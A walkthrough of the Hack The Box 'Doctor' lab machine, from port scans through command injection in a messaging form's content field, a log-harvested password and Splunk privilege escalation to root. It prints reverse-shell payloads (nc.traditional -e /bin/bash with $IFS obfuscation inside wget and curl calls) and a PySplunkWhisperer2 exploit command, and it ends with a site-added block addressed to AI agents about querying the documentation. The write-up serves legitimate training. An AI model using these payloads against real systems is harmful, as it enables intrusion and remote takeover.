# Hack The Box - Doctor Walkthrough without Metasploit ![Doctor](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlSi73pfLwmazwc3R2%2F-MSlTlBaQ_6FNHSZmjVF%2Fimage.png?alt=media\&token=71d335a5-2ad7-4759-ab4c-46347c60128a) ## Enumeration We start by running nmapAutomator script to scan the target: ``` ./nmapAutomator.sh 10.10.10.209 All ``` The Basic Nmap Scan returns the following: ![Nmap Basic Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlchvkKccC6yvCaDHf%2Fimage.png?alt=media\&token=f472b841-6849-4c63-82fa-f5e9b33b6a93) ### Ports We have the following Ports open **22, 80, 8089** #### **22** This is the SSH (Secure Shell) port, we might be able to use it later to log in if we find any valid username and its password or its rsa key. #### 80 This is commonly used for Hypertext Transfer Protocol (HTTP), and as always when we face any http port, we run Gobuster on it: ``` gobuster dir -u http://10.10.10.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -e ``` ![Gobuster First Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSltpSYogx3hi_Txp8o%2Fimage.png?alt=media\&token=cad3173f-903e-45dc-b7cd-f486fdeab836) We didn't find much, but if we go to the page itself and do some manual recon, we will see this: ![doctors.htb](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSluMI6kdoTSjk-ktHj%2Fimage.png?alt=media\&token=30ce9940-eda5-4676-917d-cafb48a6d3f7) Let's add **doctors.htb** to our /etc/hosts and perform that Gobuster scan again: ``` gobuster dir -u http://doctors.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -e ``` ![Gobuster Second Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSludqkV-DR4iXY6bA0%2Fimage.png?alt=media\&token=92fe338d-fd28-47d2-94f3-8219a5ee1b85) We found some very interesting results now, among them **login** ![Login page](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlxJD1AQruxg2dahyy%2Fimage.png?alt=media\&token=8b04ca5a-cc95-4e60-bebc-1f7c369f17ae) We don't have any credentials yet to log in, but we can Register on this Doctor Secure Messaging page. ![Registering](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlxnTt7WpGcjwLoRLS%2Fimage.png?alt=media\&token=e9d2c9e6-a495-401a-8148-57c17a26a9d5) Now that we are registered, we can log in with our e-mail and password: ![Login in](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlyA7N01fi4fCMHia1%2Fimage.png?alt=media\&token=2fba3072-45dd-4eda-ae40-69b97ccc1aa8) Once we are in, we can see two things, our Profile, and **Posts**: ![New Posts](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlzTPMMifEwY6YnuW_%2Fimage.png?alt=media\&token=5feb8c21-f1f8-402c-bac0-0fdbec9c6cbd) We try to create a test post with both title and content as test: ![Test post](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSm-CvcB8qDN_OEy13D%2Fimage.png?alt=media\&token=cee2ad7d-8aee-4a86-8631-d5ae505d3886) Now let's intercept it with Burp and see if we can play with a post creation: ![Intercepting](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSm0voK75hSAsUoXZ0v%2Fimage.png?alt=media\&token=92f57617-4fb2-4448-a958-e6ccda5ae388) We intercept it and send it to the Repeater so we can start making some tests with **title** or **content** ## **Exploitation** We are going to try and exploit either title or content in order to gain access to the box ### Foothold Since we have both title and content to play with, we will try to make a simple request on the content: First, we prepare a http server in our kali: ``` python -m SimpleHTTPServer 80 ``` ![wget request](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSm18h6qbj7Neyi_LNZ%2F-MSm2_kEL3XxyKseSexP%2Fimage.png?alt=media\&token=9ed4b020-5a39-4bf1-95bf-187d5f86824d) So, we tried to simply make a wget on the content field and for our surprise... it gets executed! What will happen if instead of a wget to retrieve a test file we try to execute some other thing. After playing with some bash payloads and nc we decided to try out nc.traditional: ``` wget http:///$(nc.traditional$IFS-e$IFS/bin/bash$IFS''$IFS'' ``` $IFS is just a way in bash to indicate a blank space ![Reverse Shell Method 1](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSm18h6qbj7Neyi_LNZ%2F-MSm6-CUp9-8V7VcQ9ZW%2Fimage.png?alt=media\&token=2227e087-9a7e-4966-a20b-3e252de364db) We could also gain a reverse shell with: ``` curl http:///$(nc.traditional$IFS-e$IFS/bin/bash$IFS''$IFS'' ``` or ``` /$(nc.traditional$IFS-e$IFS/bin/bash$IFS''$IFS''/> ``` Now we update our shell with python to a tty shell: ``` python3 -c 'import pty;pty.spawn("/bin/bash")' ``` ![upgrading shell](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSm18h6qbj7Neyi_LNZ%2F-MSm8PVLMOfEW4cl9nEe%2Fimage.png?alt=media\&token=fbfa8a7f-3eee-451e-83f2-0ec606f85c93) ## Internal Enumeration As soon as we get in, we saw that we belong to an interesting group **adm**: ![id](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmI9tSpZOGy9Q6rdBj%2Fimage.png?alt=media\&token=b0e60215-3571-4614-a521-bac5452d6ef8) We can see there are two users in /home ![Home Users](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmK9xOxu3jigPI2Y8y%2Fimage.png?alt=media\&token=4a72eec6-9b20-4c9d-a791-6c26509e0f11) So, our primary target now it's **Shaun**, as we belong to adm group we can take a look at apache2 logs: ![Apache2 logs](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmL0thobZBPRJgcm5R%2Fimage.png?alt=media\&token=818908ee-12bb-42f6-aa10-886af7eee66f) Let's see if there's any password we can grab from there: ``` grep -r password ``` Along with all the dirt created by gobuster (hehe) we found some interesting thing: ![Possible Password](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmM4g9npeh66lKJJxq%2Fimage.png?alt=media\&token=cb655eb0-6e81-40c5-9471-db3f38456562) Since we found a possible password the first thing, we have to do is to try Password-Spreading (basically test it with all the possible users) ![Shaun User](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmMeDXyNcgbWq5unHO%2Fimage.png?alt=media\&token=21758209-08f8-4015-a775-04a337e0a1a4) We tried root first (you never know\...) but it was not as easy as that, we got **Shaun** instead. We can grab our user flag from his home directory. ## Privilege Escalation At the start of the Enumeration we saw there was another port open with a service **Splunk** running, a quick google search about that gave us a privilege escalation python script: {% embed url="" %} ### Remote Privilege Escalation Since we have the port 8089 open, we can try the remote version of the python script: ``` python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost --username shaun --password Guitar123 --payload "nc.traditional -e /bin/bash '' ''" ``` ![Remote Exploit](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmT19NjwN7SgF36RY1%2Fimage.png?alt=media\&token=dd1b3c7d-ab02-4537-949f-1b24725832fc) ### Internal Privilege Escalation In the case that we could not access the port we can still escalate privileges with the local method, it doesn't work out of the box, on the victim we have python3 and the script was coded in python2, since it has methods such as **raw\_input()** and **print without ()**, we have to change: **raw\_input()** --> **input()** And every **print** has to be enclosed with **()** Once we have made those changes it works like a charm sending a reverse shell: ![Local Exploit](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmV1l6ZRcgewkrt4qN%2Fimage.png?alt=media\&token=97b3e400-9200-4e70-9a83-f4c7f2d62b47) ## Pwnd We can grab our root flag: ![Pwned](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmVMUDohSVmNtFRdof%2Fimage.png?alt=media\&token=0eb662e3-e7e8-4d74-97ce-0d9e29d2bced) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://4st1nus.gitbook.io/hackthebox/htb/hack-the-box-doctor-walkthrough-without-metasploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.